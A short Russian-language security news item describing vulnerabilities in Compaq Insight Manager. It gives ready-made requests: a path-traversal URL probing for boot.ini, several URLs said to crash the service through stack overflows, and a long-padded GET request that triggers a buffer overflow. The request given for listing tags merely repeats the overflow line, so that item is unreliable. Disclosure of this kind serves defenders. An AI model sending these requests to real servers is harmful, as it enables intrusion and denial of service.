Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Несколько уязвимостей обнаружено в Compaq Insight Manager. Удаленный пользователь может определить существование файла на системе. Также удаленный пользователь может аварийно завершить работу сервиса. 

Сообщается, что удаленный пользователь может запросить следующий URL, чтобы определить существования файла на сервере: 

http://[target]:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

Также сообщается, что несколько URL могут вызвать переполнение стека: 

http://[target]:2301/<!.StringRedirecturl>
http://[target]:2301/<!> 
http://[target]:2301/survey/<!>
http://[target]:2301/<!.StringHttpRequest=Url>
http://[target]:2301/survey/<!.StringHttpRequest=Url>
http://[target]:2301/<!.St ringIsapiECB=lpszPathInfo>
http://[target]:2301/<!.ObjectIsapiECB>

Переполнение буфера может быть вызвано следующим запросом: 

GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0

Также удаленный пользователь может просмотреть 'TAG' список, запрашивая следующий URL: 

GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0

Все вышеперечисленные проблемы могут также эксплуатироваться через https порт.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии